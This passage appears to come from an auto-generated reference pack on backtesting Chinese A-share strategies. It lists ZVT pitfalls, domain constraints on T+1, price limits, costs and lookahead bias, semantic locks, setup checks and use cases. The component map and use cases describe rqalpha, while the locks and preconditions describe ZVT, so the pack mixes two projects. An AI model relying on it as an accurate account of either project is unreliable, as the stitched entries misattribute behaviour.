ZVT 文档示例使用 `from zvt import *` 导入所有符号。当 ZVT 版本升级重构 枚举（如将 AdjustType 移入子模块）后，通配符导入不再包含该符号，触发 AttributeError。使用者误以为是安装问题，实际是版本间 API breaking change 未在 CHANGELOG 中标注，且通配符导入掩盖了具体来源。应显式 import 枚举类。

Source: https://github.com/zvtvz/zvt/issues/129

### `AP-ZVT-187` — 回测引擎未在数据层空结果时提前终止，导致空指针级联崩溃 <sub>(medium)</sub>

ZVT Trader 在 load_data 完成后检查数据为空时，不提前退出，而是将空 DataFrame 传入 selector 计算，触发后续 NoneType 操作链式崩溃。错误栈深且难以定位根因， 用户误以为是策略逻辑问题。根因是数据时间窗口配置错误（start/end 不在数据 库覆盖范围内）但无有效校验。

Source: https://github.com/zvtvz/zvt/issues/187

### `AP-ZVT-183B` — HFQ（后复权）与 QFQ（前复权）K 线表使用错误导致因子计算漂移 <sub>(high)</sub>

ZVT 提供 Stock1dKdata（不复权）、Stock1dHfqKdata（后复权）、Stock1dQfqKdata （前复权）三张独立表。用户在计算价格动量/均线因子时混用两张表（如用不复权 做均线，用后复权做收益率），导致除权日前后因子值产生跳变。ZVT 不做跨表 复权类型一致性校验，混用静默通过。

Source: https://github.com/zvtvz/zvt/issues/183

FILE:references/COMPONENTS.md
# Component Capability Map

**Project**: finance-bp-089--rqalpha
**Scan date**: 2026-04-22
**Stats**: {'total_files': 6, 'total_classes': 31, 'total_functions': 0, 'total_stages': 6}

## Modules (6)

- [data_layer](components/data_layer.md): 6 classes
- [event_system](components/event_system.md): 4 classes
- [strategy_execution](components/strategy_execution.md): 5 classes
- [risk_&_scheduler_modules](components/risk_-_scheduler_modules.md): 5 classes
- [order_&_execution](components/order_-_execution.md): 5 classes
- [portfolio_&_accounting](components/portfolio_-_accounting.md): 6 classes

FILE:references/CONSTRAINTS.md
# Constraints

## preservation_manifest

```yaml
required_objects:
  business_decisions_count: 173
  fatal_constraints_count: 66
  non_fatal_constraints_count: 194
  use_cases_count: 2
  semantic_locks_count: 12
  preconditions_count: 4
  evidence_quality_rules_count: 2
  traceback_scenarios_count: 5

```

## Domain Constraints Injected (71)

- **`SHARED-CN-ASTOCK-T1-001`** <sub>(fatal)</sub>: A 股股票实行 T+1 交收制度：T 日买入的股票最早 T+1 日方可卖出。 T 日卖出所得资金可当日再用于买入。回测框架若未施加 T+1 持仓锁定， 将高估换手率与策略胜率，尤其损害日内反转类策略的真实性。
- **`SHARED-CN-ASTOCK-T1-002`** <sub>(fatal)</sub>: 沪深主板股票日涨跌幅上限为 ±10%（ST/SST 股票 ±5%）。 涨停封板时买方消失、跌停封板时卖方消失；回测若假设当日可以任意价格 成交，会系统性高估可执行性。封板检测应在成交模拟层强制实施。
- **`SHARED-CN-ASTOCK-T1-003`** <sub>(high)</sub>: 科创板和创业板（2020年8月改革后）正常交易日涨跌幅为 ±20%； 北交所 ±30%；新股上市后前5个交易日不设涨跌幅限制。 回测若对所有股票统一套用 ±10% 过滤逻辑，会错误剔除或错误包含这些板块的成交。
- **`SHARED-CN-ASTOCK-T1-004`** <sub>(high)</sub>: ST/*ST 股票日涨跌幅限制为 ±5%，流动性极差，成交假设不可与正常股票混用。 包含历史 ST 股票（最终退市）但不纳入回测会产生幸存者偏差； 纳入回测但不区分 ST 涨跌幅会错误模拟成交。
- **`SHARED-CN-ASTOCK-T1-005`** <sub>(medium)</sub>: A 股开盘集合竞价（9:15-9:25）和收盘集合竞价（14:57-15:00）期间， 成交价由"最大成交量原则"确定，非即时撮合。回测以开盘价或收盘价假设 即时全量成交会低估实际滑点风险，大单策略尤为明显。
- **`SHARED-CN-ASTOCK-T1-006`** <sub>(high)</sub>: 停牌制度：A 股长期停牌（2018年前可长达数月）期间，持仓资金被锁定， 无法再平衡，机会成本在回测中普遍被忽略。应在因子计算前过滤停牌日 （volume == 0 或 is_suspended == True），停牌期间不发出信号。
- **`SHARED-CN-ASTOCK-T1-007`** <sub>(high)</sub>: 新股上市后前5个交易日无涨跌幅限制（首日涨幅可超300%）， 且无完整历史数据（均线/波动率/换手率因子无法计算）。 应在因子计算前过滤上市不足 N 个交易日（通常 60-252 日）的股票。
- **`SHARED-CN-ASTOCK-T1-008`** <sub>(high)</sub>: A 股程序化交易监管新规（2025年7月7日施行）：单账户每秒申报/撤单 ≥ 300 笔， 或单日申报/撤单 ≥ 20000 笔，被认定为高频交易，须向交易所报备。 AI 生成的量化策略若频率超标则无法合规运行，应在策略设计期提示。
- **`SHARED-CN-ASTOCK-ADJ-001`** <sub>(fatal)</sub>: 除权除息日股价跳空是账面调整而非真实亏损。复权选择： 不复权会虚增策略亏损；前复权会将历史价格内嵌未来分红信息（lookahead bias）； 后复权以上市首日为基准累积，是量化回测的最优选择。
- **`SHARED-CN-ASTOCK-ADJ-002`** <sub>(fatal)</sub>: A 股上市公司财务报告披露有法定延迟：年报在次年4月30日前、 半年报在8月31日前、季报分别在4月30日（一季）/10月31日（三季）前披露。 回测中使用财务数据时，必须以实际披露日期（announcement_date）而非 会计期间结束日作为数据可用时间点，否则引入 point-in-time lookahead bias。
- **`SHARED-CN-ASTOCK-ADJ-003`** <sub>(high)</sub>: 分红送股转增和配股会导致除权除息日后股本增加，历史持股数量不变但股价等比 缩水，若回测系统未同步调整持仓股数，会在除权日产生虚假亏损或盈利。
- **`SHARED-CN-ASTOCK-ADJ-004`** <sub>(medium)</sub>: 大宗交易与竞价交易价差：大宗交易成交价可比市价折价最多 10%（主板）， 但此价格不影响次日竞价开盘。大宗交易数据出现在收盘后，若将其混入 日内 OHLCV 数据，会污染收盘价和成交量的正常计算。
- **`SHARED-CN-ASTOCK-ADJ-005`** <sub>(fatal)</sub>: 融资融券（两融）做空限制：A 股散户无法直接卖空，融券标的池有限（主要为 大盘蓝筹，中小盘融券极度稀缺），融券利率远高于融资利率。 回测若直接假设可做空任意股票，会产生不可执行的策略，实盘与回测严重背离。
- **`SHARED-CN-ASTOCK-FX-001`** <sub>(high)</sub>: 通过沪深港通（北向）买入股票，境外投资者合计持股上限 30%，预警线 28%。 当外资持股比例达 28% 时，联交所暂停该股新增买盘，直到降至 26% 才恢复。 策略若重仓外资偏好股（消费/医药龙头），需监控外资持股比例。
- **`SHARED-CN-ASTOCK-FX-002`** <sub>(high)</sub>: 5% 举牌规则：单一投资者持有上市公司已发行股份超过 5%，须在3日内向证监会 和交易所报告并公告；在此期间及公告后2日内不得再买卖。 量化选股系统若不考虑此规则，重仓股超过 5% 阈值后将面临强制停止买入。
- **`SHARED-CN-ASTOCK-FX-003`** <sub>(high)</sub>: 公募基金"双十原则"：单基金持有单只股票不超过净资产 10%， 同一基金管理人旗下所有基金合计不超过该公司已发行股份 10%。 量化选股组合若部署于公募基金，需在优化约束中强制加入合规上限。
- **`SHARED-CN-ASTOCK-FX-004`** <sub>(fatal)</sub>: 内幕交易边界：AI 辅助量化系统的所有输入数据必须来自公开已披露信息。 通过非公开渠道（私有数据服务/内部消息/重组前预知）触发的自动化交易 构成内幕交易，适用《证券法》第80-83条及《内幕交易行为认定指引》。
- **`SHARED-CN-ASTOCK-MKT-001`** <sub>(fatal)</sub>: 幸存者偏差：使用当前 A 股成分股（如当前沪深300）作为历史回测股票池， 会遗漏曾被纳入指数但因业绩差被调出或退市的股票。2020-2024年 A 股 退市数量加速（41家/年创纪录），此偏差日趋严重。必须使用历史时点快照。
- **`SHARED-CN-ASTOCK-MKT-002`** <sub>(medium)</sub>: 指数成分股调整效应：沪深300/中证500等每半年调整一次（6月/12月）， 被纳入股票通常在公告日至生效日之间显著上涨（被动资金被动买入）， 被剔除股票则相反。回测股票池应使用历史成分股快照，并标注调整窗口期。
- **`SHARED-CN-ASTOCK-MKT-003`** <sub>(high)</sub>: 策略拥挤（Strategy Crowding）：大量量化私募使用相似因子模型时， 持仓高度重叠，遇市场冲击时集体卖出形成踩踏。2024年2月 A 股量化危机 是典型案例（小盘股指数单日跌幅超 10%）。需监控因子多头持仓与 主流量化基金的重叠率。
- **`SHARED-CN-ASTOCK-MKT-004`** <sub>(high)</sub>: A 股量化对冲策略常用 IF/IC/IM 股指期货做多/空对冲系统性风险。 但 A 股股指期货长期处于贴水（远期价格 < 现货），IC 年化贴水可达 10-20%。 回测若仅考虑价格收益而忽略期货贴水/升水，会严重高估对冲策略净收益。
- **`SHARED-CN-ASTOCK-MKT-005`** <sub>(high)</sub>: A 股月度动量因子在方向上与美股相反：近1个月表现最好的股票， 下1个月大概率反转（反转效应而非动量）。机构研究（华泰/东吴证券） 与学术论文均验证：直接套用美股月度动量因子在 A 股会产生系统性亏损。
- **`SHARED-CN-ASTOCK-BF-001`** <sub>(medium)</sub>: 处置效应（Shefrin & Statman 1985）在 A 股散户中尤为显著： 投资者倾向于过早卖出盈利股票、过长持有亏损股票。上交所实证研究证实 超过 90% 的个人账户存在此效应，AI 辅助工具不应迁就"持有亏损等解套" 的直觉，而应基于量化信号提供纪律性止损止盈建议。
- **`SHARED-CN-ASTOCK-BF-002`** <sub>(medium)</sub>: A 股以散户为主（个人账户交易量占比超 80%），羊群效应显著：散户倾向于 跟风操作，导致价格非理性波动（如 2015年杠杆牛熊）。量化策略应避免 使用成交量排行/热度排行等可能强化羊群信号的指标作为主要因子。
- **`SHARED-CN-ASTOCK-BF-003`** <sub>(medium)</sub>: 过度自信效应（Barber & Odean 2000）在 A 股散户中更严重：散户年均换手率 超 500%，机构长期收益显著优于散户。高换手率策略经交易成本后净收益往往 更低。AI 不应鼓励"频繁操作"，而应推荐低频高质信号驱动交易。
- **`SHARED-CN-ASTOCK-BF-004`** <sub>(medium)</sub>: A 股日历效应：春节效应（节前5日和节后1-3日倾向上涨）、月初效应 （月初第1-5个交易日表现优于月中/月末）已有学术实证（南京财经大学等）。 策略应在日历特殊窗口降低信号置信度，或单独评估日历驱动收益的贡献。
- **`SHARED-CN-ASTOCK-BF-005`** <sub>(high)</sub>: 策略容量（Capacity）限制：A 股小盘/微盘股日均成交额仅数百万， 大资金买入/卖出会造成严重价格冲击，策略实际容量可能仅几千万元。 回测结果不可外推至亿级资金，应在回测中加入成交量比例上限约束。
- **`SHARED-CN-ASTOCK-COST-001`** <sub>(fatal)</sub>: A 股完整交易成本结构（2023年8月调整后）：印花税卖出单向 0.05%； 佣金双向约 0.01%（最低5元）；过户费（沪市）0.001%； 滑点/冲击成本小盘股 0.1%-0.5%/次。忽略成本的回测策略年化收益率 具有欺骗性，高频/高换手策略尤甚。
- **`SHARED-CN-ASTOCK-COST-002`** <sub>(high)</sub>: 市场冲击成本（Market Impact）在回测中通常完全缺失，但在实盘中可能是 最大成本来源。A 股小盘股 100 万元买入可能推高 1% 以上。冲击成本与 成交规模呈幂律而非线性关系，应使用 Almgren-Chriss 模型或简化版估算。
- **`SHARED-CN-ASTOCK-COST-003`** <sub>(medium)</sub>: 大股东/董监高减持新规（证监会第224号令，2024年5月）：持股5%以上大股东 通过集中竞价减持须提前15个交易日披露减持计划，3个月内不超过股份总数1%。 解禁股减持压力是 A 股特有的系统性风险因子，回测中忽略解禁日历会低估 相关股票的持股风险。
- **`SHARED-CN-ASTOCK-DATA-001`** <sub>(high)</sub>: A 股交易日历与自然日历不一致：存在法定节假日调休导致的"补班日"（周六上班）， 以及临时停市（2015年7月8日至7月10日因股灾紧急停市）。 使用通用工作日历（weekdays）推算 A 股交易日会产生偏差， 必须使用 A 股专用交易日历（如 exchange_calendars 或 tushare 的交易日接口）。
- **`SHARED-CN-ASTOCK-DATA-002`** <sub>(medium)</sub>: A 股退市后股票代码可能被新股重用（极少见但存在）。使用纯代码（如 '000001'） 作为历史数据主键而不包含交易所后缀（'.SZ'）或上市日期范围，可能导致 历史数据与当前股票的错误混淆，长周期回测中需特别注意。
- **`SHARED-BT-LAB-001`** <sub>(fatal)</sub>: 未来函数（Lookahead Bias）：在模拟历史时间点 t 的交易决策时， 不得使用 t 时刻之后才能知道的信息。最常见形式： (1) 使用收盘价计算信号并同日以收盘价成交； (2) 将 T 日收盘后计算的指标标记在同一根 K 线； (3) 使用当日最高/最低价作为成交假设。 信号计算与成交时间必须对齐：T 日收盘后计算信号，T+1 日开盘成交。
- **`SHARED-BT-LAB-002`** <sub>(high)</sub>: 指标预热期（Warmup Period）处理：滚动窗口指标在前 N 个 bar 时 NaN， 这些 bar 不应参与信号计算和持仓决策。强制要求指标的 warmup_period 与最长 lookback 期等长，且 warmup 期间持仓应置零。
- **`SHARED-BT-LAB-003`** <sub>(fatal)</sub>: ML/DL 模型时序数据划分必须按时间顺序：TRAIN < VALID < TEST， 不可使用随机 k-fold 分折（会将未来数据混入训练集）。 应使用 TimeSeriesSplit 或 Walk-Forward 验证。
- **`SHARED-BT-LAB-004`** <sub>(fatal)</sub>: 开盘价/最高价/最低价成交假设：日线回测中假设每日可以最高价卖出或 最低价买入（如动量策略"最高价止盈"），这是明显的 lookahead， 因为日内最高/最低价只有收盘后才能确认。成交价只能用开盘价或 前一日收盘价（带滑点）。
- **`SHARED-BT-LAB-005`** <sub>(high)</sub>: 数据对齐偏移（Off-by-one）：pandas rolling/shift 等操作容易引入细微的 1 期偏移错误。应在代码中明确记录每个序列的"观测时间点"， 并通过 assert 验证关键时间对齐关系。
- **`SHARED-BT-LAB-006`** <sub>(high)</sub>: 过度优化（Overfitting）：回测数量越多，过拟合概率越高。 Bailey et al.（2014）证明 Optimal Sharpe Ratio 期望值随回测次数单调递减。 应使用 Walk-Forward 验证代替 in-sample 参数穷举，并报告 Deflated Sharpe Ratio（DSR）而非峰值 Sharpe。
- **`SHARED-BT-SURV-001`** <sub>(fatal)</sub>: 幸存者偏差（Survivorship Bias）：使用当前市场成分股作为历史回测股票池， 会遗漏曾经存在但后来退市、摘牌或被合并的股票，系统性高估策略历史收益率。 回测股票池必须使用历史时点快照（point-in-time universe）。
- **`SHARED-BT-SURV-002`** <sub>(high)</sub>: In-Sample / Out-of-Sample 划分：策略开发、参数选择必须在样本内完成， 样本外数据仅用于最终验证，不可多次"看"样本外数据后继续调优 （会将样本外变为新的样本内，重蹈过拟合）。
- **`SHARED-BT-SURV-003`** <sub>(high)</sub>: 停牌/缺失数据的填充策略：停牌日价格不可简单用前一日收盘价 forward-fill， 因为这会在复盘时造成"零成交量"日参与了因子计算和信号生成。 应在因子计算层显式过滤缺失交易日，不填充。
- **`SHARED-BT-SURV-004`** <sub>(high)</sub>: 异常值（Extreme Value）污染：原始市场数据可能含有数据源错误（如除权未 及时调整、手工录入错误导致的极端价格），不清洗直接进入因子计算会产生 极端信号，污染整个横截面。应在 pipeline 入口处过滤 3-sigma 异常值。
- **`SHARED-BT-COST-001`** <sub>(fatal)</sub>: 交易成本（佣金 + 印花税/转让税 + 过户费）必须在回测初始化时强制配置， 不可使用零成本默认值。忽略成本的回测策略绩效指标具有欺骗性， 高换手率策略尤其严重（单边往返成本往往吞噬 50%+ 的毛收益）。
- **`SHARED-BT-COST-002`** <sub>(high)</sub>: 滑点（Slippage）建模：回测若无滑点，假设每笔订单以理想价格成交， 高频策略在实盘中会因成交价劣化而产生严重亏损。至少应配置固定点差 或比例滑点；大单应使用成交量比例模型（如不超过日成交量 5%）。
- **`SHARED-BT-COST-003`** <sub>(high)</sub>: 换手率（Turnover）必须在回测绩效报告中展示并与成本关联分析。 月换手率超过 50%（年化 600%+）时，策略净收益对成本假设极度敏感， 每 10bps 成本变化可能改变策略盈亏结论，必须做成本敏感性分析。
- **`SHARED-BT-COST-004`** <sub>(medium)</sub>: 仓位规模化（Position Sizing）必须纳入资金量约束：回测应模拟固定资金量 下的实际持仓股数（取整），而非假设可以持有小数股。 对小盘股，最小交易单位（A股：100股/手）会导致实际可持仓量与目标权重 产生偏差，应在回测中模拟取整效应。
- **`SHARED-BT-TIME-001`** <sub>(high)</sub>: 时间戳时区统一：多数据源合并时，UTC vs 本地时间混用是常见数据腐败源。 所有时间戳必须在 pipeline 入口处统一转换为同一时区（推荐 UTC 存储， 市场本地时区展示），不可在 pipeline 中途混用不同时区。
- **`SHARED-BT-TIME-002`** <sub>(high)</sub>: 交易日历对齐：合并不同市场或不同频率数据时（如日线价格 + 周频因子）， 必须使用明确的交易日历进行 reindex/merge，不可使用 outer join 后 fillna， 否则会在非交易日（节假日）创建虚假数据行。
- **`SHARED-BT-TIME-003`** <sub>(high)</sub>: 增量更新边界校验：历史数据增量更新时，必须从数据库查询已存最新日期， 仅下载该日期之后的数据。若重新下载已有数据并追加，会产生时间戳重复行， 导致回测时序错误。更新前后必须校验无重复 (index.duplicated().any() == False)。
- **`SHARED-BT-TIME-004`** <sub>(medium)</sub>: 回测绩效归因失真：基准（Benchmark）选择不当会使 Alpha/Beta 计算失真。 应选用策略实际可投资的被动基准（如 HS300 ETF），而非不可直接投资的 价格指数（如 HS300 指数）。价格指数不含股息再投资，会低估持仓基准收益。
- **`SHARED-BT-PERF-001`** <sub>(medium)</sub>: 最大回撤（Max Drawdown）计算必须使用净值序列（portfolio value）， 不可用累计收益率序列代替。若使用对数收益率累加，会低估回撤深度 （因对数收益率在下跌时会比简单收益率偏小）。
- **`SHARED-BT-PERF-002`** <sub>(medium)</sub>: Sharpe Ratio 年化化约定：年化 Sharpe = 日 Sharpe × sqrt(252)（股票，252 交易日） 或 × sqrt(365)（加密货币，365日）。不同系统默认不同，跨系统对比前必须 确认年化因子，否则 Sharpe 不可比。
- **`SHARED-BT-PERF-003`** <sub>(medium)</sub>: Calmar Ratio / Sortino Ratio 优于 Sharpe Ratio 作为风险调整收益指标： Sharpe 假设收益正态分布，A 股/加密市场的收益分布显著左偏（肥尾）， 会低估下行风险。量化评估应同时报告 Sortino（仅下行波动）和 Calmar（年化收益/最大回撤），不应单一依赖 Sharpe。
- **`SHARED-BT-PERF-004`** <sub>(medium)</sub>: 回测绩效归因应拆解为：alpha（主动收益）、beta（市场收益）、 因子暴露收益（style/sector）和特异性收益（stock selection）。 不做归因的回测无法区分"策略优秀"与"顺风行情恰好 beta 对了"。
- **`SHARED-FR-IC-001`** <sub>(high)</sub>: IC（信息系数）是衡量因子预测能力的核心指标，定义为因子值与 下期收益率的 Spearman 秩相关系数（ICIR = IC / std(IC)）。 IC 绝对值 > 0.05 视为有预测能力的初步证据，ICIR > 0.5 视为稳定。 不计算 IC 直接报告回测绩效是因子有效性证明缺失的典型问题。
- **`SHARED-FR-IC-002`** <sub>(high)</sub>: IC 衰减（IC Decay）分析：因子预测能力通常随持仓期增长而衰减。 应计算 1/5/10/20 日 IC 序列，识别因子的最优持仓期。 IC 在1日高但20日迅速衰减的因子是短期因子，不适合月度换仓策略； 反之亦然。使用错误的持仓期会严重损害因子实盘表现。
- **`SHARED-FR-IC-003`** <sub>(high)</sub>: Harvey, Liu & Zhu (2016) 警告：学术界已发现 300+ 个"显著"因子， 其中大量是多重检验下的误发现（False Discovery）。因子有效性要求： t-stat > 3.0（而非传统的 1.96）；或在不同时段/市场独立复现； 或有清晰的经济学逻辑。不满足上述条件的因子极可能是数据挖掘产物。
- **`SHARED-FR-IC-004`** <sub>(high)</sub>: 因子换手率（Factor Turnover）控制：高 IC 但高换手率的因子，在扣除 交易成本后净 IC 可能为负。应计算换手率调整后的有效 IC： net_IC = IC - turnover × cost_per_turn。目标换手率 ≤ 50%（月频）。
- **`SHARED-FR-IC-005`** <sub>(medium)</sub>: 因子衰减期（Half-life）是因子信号强度的核心参数，直接决定最优再平衡频率。 半衰期 < 5 日：日频或周频换仓；5-20 日：周频或双周；> 20 日：月频换仓。 错误地对短期因子使用月频换仓，会导致大量 alpha 在持仓期内消散。
- **`SHARED-FR-NEUT-001`** <sub>(high)</sub>: 行业中性化（Industry Neutralization）：因子值若不对行业均值中性化， 因子收益中会混入行业轮动收益，难以判断是因子本身还是行业暴露驱动了收益。 行业中性化操作：factor_neutral = factor - industry_mean(factor)。
- **`SHARED-FR-NEUT-002`** <sub>(high)</sub>: 市值中性化（Market Cap Neutralization）：小盘股效应（小盘跑赢大盘） 是金融史上最持久的 anomaly 之一，会污染几乎所有未中性化的因子。 若因子与市值高度相关，选股会系统性偏向小盘，收益来自市值暴露而非因子本身。 需同时进行行业和市值中性化（Fama-MacBeth 回归或残差法）。
- **`SHARED-FR-NEUT-003`** <sub>(high)</sub>: 异常值处理（Winsorize/MAD）：因子原始值通常含有极端值，极端值会扭曲 分组分析（如 Q1/Q10 十分位）。应对原始因子值做 Winsorize（截尾至 [1%, 99%] 或 3-sigma）或 MAD（中位数绝对偏差）缩尾，然后再排名/中性化。
- **`SHARED-FR-NEUT-004`** <sub>(medium)</sub>: 因子正交化（Factor Orthogonalization）：当多个因子共同用于合成打分时， 高相关因子的合成等效于对单一因子过度权重，稀释信号多样性。 应在合成前对因子做施密特正交化或 PCA，消除因子间的多重共线性。
- **`SHARED-FR-NEUT-005`** <sub>(medium)</sub>: 缺失数据填充策略：因子计算中的 NaN（停牌/新股/数据缺口）若用截面均值填充 会引入 lookahead bias（均值本身含未来信息）；若完全删除会产生幸存者偏差； 正确做法是用截面中位数（当日所有股票的中位数，不依赖未来）或将该股当日排除。
- **`SHARED-FR-PORT-001`** <sub>(high)</sub>: 分层分析（Quantile Analysis）：因子评估应使用 Q1/Q5（五分位）或 Q1/Q10（十分位）分组的多空收益差（top minus bottom spread）作为 主要评估指标，而非简单的多头收益。Q1 多 Q5 空的"单调性"检验是 因子有效性的核心证据：单调递增/递减 > 非单调 >> 仅多头有效。
- **`SHARED-FR-PORT-002`** <sub>(medium)</sub>: Alpha 衰减测试（Alpha Decay Test）：因子的月度 IC 在不同时段（牛市/熊市/ 震荡市）的稳定性是因子鲁棒性的重要证据。IC 仅在某个特定市场状态下有效 的因子不适合全天候部署；应分段（rolling 12M）展示 IC 时序， 识别因子失效期。
- **`SHARED-FR-PORT-003`** <sub>(medium)</sub>: 换仓成本感知（Turnover-Aware Selection）：因子排名靠近中间地带（49-51 分位） 的股票，排名小幅波动就会触发换仓，产生大量无效交易成本。 应在选股时设置换仓缓冲区（buffer zone）：只在排名变化超过阈值时才换仓。
- **`SHARED-FR-PORT-004`** <sub>(medium)</sub>: 分组收益的统计显著性（Bootstrap 检验）：因子分层收益差（Q1-Q5 spread） 即使在历史数据上很大，也可能是偶然，需要 bootstrap 或 t-test 检验 显著性（p-value < 0.05）。小样本回测期（< 3年）的分层收益尤其不可靠。
- **`SHARED-FR-XFER-001`** <sub>(high)</sub>: 因子跨市场可移植性验证：在一个市场有效的因子，不必然在另一个市场有效。 将美股因子直接套用 A 股、或将股票因子套用期货/加密货币，需要独立 IC 验证， 不可假设跨市场通用性。A 股特有异象（如反转效应、ST 价格异常）不存在于美股。
- **`SHARED-FR-XFER-002`** <sub>(medium)</sub>: 因子有效性时间稳定性：曾经有效的因子会因市场学习和套利行为逐渐失效 （McLean & Pontiff 2016 证明因子发表后平均衰减 58%）。 应定期（每季度/年）重新评估因子 IC，失效因子应及时替换或降权。
- **`SHARED-FR-XFER-003`** <sub>(medium)</sub>: 因子与宏观经济环境的交互：利率周期/经济周期/市场情绪对因子有效性影响显著。 价值因子（低 P/B）在利率上升期更有效；动量因子在趋势市更有效，震荡市失效。 部署因子前应评估当前宏观环境与因子最优生存环境的匹配度。

FILE:references/LOCKS.md
# Semantic Locks + Preconditions

## Semantic Locks (12)

### `SL-01` <sub>(on_violation: fatal)</sub>
Execute sell orders before buy orders in every trading cycle

### `SL-02` <sub>(on_violation: fatal)</sub>
Trading signals MUST use next-bar execution (no look-ahead)

### `SL-03` <sub>(on_violation: fatal)</sub>
Entity IDs MUST follow format entity_type_exchange_code

### `SL-04` <sub>(on_violation: fatal)</sub>
DataFrame index MUST be MultiIndex (entity_id, timestamp)

### `SL-05` <sub>(on_violation: fatal)</sub>
TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount

### `SL-06` <sub>(on_violation: fatal)</sub>
filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION

### `SL-07` <sub>(on_violation: fatal)</sub>
Transformer MUST run BEFORE Accumulator in factor pipeline

### `SL-08` <sub>(on_violation: fatal)</sub>
MACD parameters locked: fast=12, slow=26, signal=9

### `SL-09` <sub>(on_violation: warning)</sub>
Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001

### `SL-10` <sub>(on_violation: fatal)</sub>
A-share equity trading is T+1 (no same-day close of buy positions)

### `SL-11` <sub>(on_violation: fatal)</sub>
Recorder subclass MUST define provider AND data_schema class attributes

### `SL-12` <sub>(on_violation: fatal)</sub>
Factor result_df MUST contain either 'filter_result' OR 'score_result' column

## Preconditions (4)

- **`PC-01`**: `python3 -c 'import zvt; print(zvt.__version__)'` → on_fail: Run: python3 -m pip install zvt then re-run: python3 -m zvt.init_dirs to initialize data directories
- **`PC-02`**: `python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1); assert df is not None and len(df) > 0, 'No kdata found'"` → on_fail: Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000 (replace with your target entity IDs)
- **`PC-03`**: `python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); assert zvt_home.exists(), f'ZVT home not found: {zvt_home}'"` → on_fail: Run: python3 -m zvt.init_dirs
- **`PC-04`**: `python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"` → on_fail: Check directory permissions: chmod u+w ~/.zvt or set ZVT_HOME environment variable to a writable location

FILE:references/USE_CASES.md
# Known Use Cases (KUC)

Total: **2**

## `KUC-101`
**Source**: `docs/source/notebooks/run-rqalpha-in-ipython.ipynb`

Implements a momentum-based rotation strategy between equity indices (CSI 300, CSI 500) and government bonds, automatically rebalancing to the best-performing asset class based on 20-day price momentum.

## `KUC-102`
**Source**: `docs/source/conf.py`

Configuration file for building rqalpha project documentation using Sphinx, setting up autodoc, autosummary, and other documentation extensions.

FILE:references/WISDOM.md
# Cross-Project Wisdom

Total: **10**

## `CW-BT-001` — Cerebro 统一编排引擎
**From**: backtrader · **Applicable to**: backtesting

backtrader 用 Cerebro 作为单一入口，统一管理 data feeds、strategies、analyzers、 observers 的生命周期，支持一次 cerebro.run() 跑多策略+多数据源。 zvt 的 StockTrader 目前每次实例化只绑定一套因子，缺乏统一的多策略组合编排层； 借鉴 Cerebro 模式可让用户把多个 Trader 实例组合到一个 runner 中对比评估。

## `CW-BT-002` — Analyzer 插件化绩效评估
**From**: backtrader · **Applicable to**: backtesting

backtrader 提供 SharpeRatio、DrawDown、TimeReturn、TradeAnalyzer 等即插即用 的 Analyzer，可在不修改策略代码的情况下附加任意绩效指标。 zvt 当前绩效评估能力较弱，没有标准化的 Analyzer 接口； 借鉴此模式可让用户 cerebro.addanalyzer(SharpeRatio) 即得风险调整收益报告。

## `CW-BT-003` — Sizer 仓位管理分离
**From**: backtrader · **Applicable to**: backtesting

backtrader 将仓位管理（每次开仓买多少股/多大比例）单独抽象为 Sizer， 与信号逻辑完全解耦；内置 FixedSize、PercentSizer 等，用户可自定义。 zvt 目前没有显式的 Sizer 概念，仓位控制逻辑散落在 Trader.on_profit_control 等钩子中； 引入 Sizer 接口可使策略信号与资金管理规则独立演化和组合复用。

## `CW-BT-004` — Order 类型全集（Limit/Stop/OCO/Bracket）
**From**: backtrader · **Applicable to**: backtesting

backtrader 支持 Market、Limit、Stop、StopLimit、OCO（二选一）、 Bracket（止盈止损一对订单）等丰富订单类型，并模拟成交滑点和手续费方案。 zvt 回测目前主要支持市价成交，缺乏限价委托和组合订单模拟； 对于高频或实盘对接场景，完善订单类型将大幅提升回测真实性。

## `CW-BT-005` — 数据重采样与重播（Resampling & Replaying）
**From**: backtrader · **Applicable to**: backtesting

backtrader 可将低级别数据（如 1 min）实时 resample 为高级别（如 1 day）并同步驱动策略， 或 replay 逐 tick 模拟 OHLC 形成过程，实现日内精细回测。 zvt 目前多时间框架通过预录入不同级别 K 线实现，缺少运行时动态重采样； 借鉴此模式可在不重复录入数据的前提下支持任意时间粒度组合回测。

## `CW-VN-003` — CTA 回测引擎内置可视化
**From**: vnpy · **Applicable to**: backtesting

vnpy 的 cta_backtester 提供图形界面直接展示策略净值曲线、最大回撤、 每日盈亏、成交明细，无需 Jupyter Notebook。 zvt 目前回测结果可视化依赖 draw_result 方法调用 Plotly，但无统一的回测报告页面； 借鉴此模式可打包一个开箱即用的策略绩效仪表盘。

## `CW-VN-004` — vnpy.alpha ML 因子研究实验室（Lab）
**From**: vnpy · **Applicable to**: factor-research

vnpy 4.0 的 vnpy.alpha.lab 提供数据管理、模型训练、信号生成、策略回测一体化工作流， 支持 Lasso/LightGBM/MLP 等算法的标准化训练接口和可视化对比。 zvt 的 ML 能力目前仅有 MaStockMLMachine 一个入口，缺乏规范化 Lab 框架； 借鉴 Lab 模式可建立"特征工程→训练→信号→回测"的标准流水线，降低 ML 实验门槛。

## `CW-QL-001` — Point-in-Time 数据库（防未来数据泄漏）
**From**: qlib · **Applicable to**: backtesting

qlib 的 Point-in-Time Provider 保证在给定时间点 t 的查询只返回 t 时刻 真实可知的数据（财报发布延迟、修订历史均被正确处理）， 彻底消除回测中的 look-ahead bias。 zvt 目前财务数据以报告期为 timestamp，缺少"发布日"维度， 存在用未来财报数据做选股的潜在偏差；引入 PIT 模式可大幅提升回测可信度。

## `CW-QL-002` — Recorder + Experiment 实验管理（MLflow 风格）
**From**: qlib · **Applicable to**: factor-research

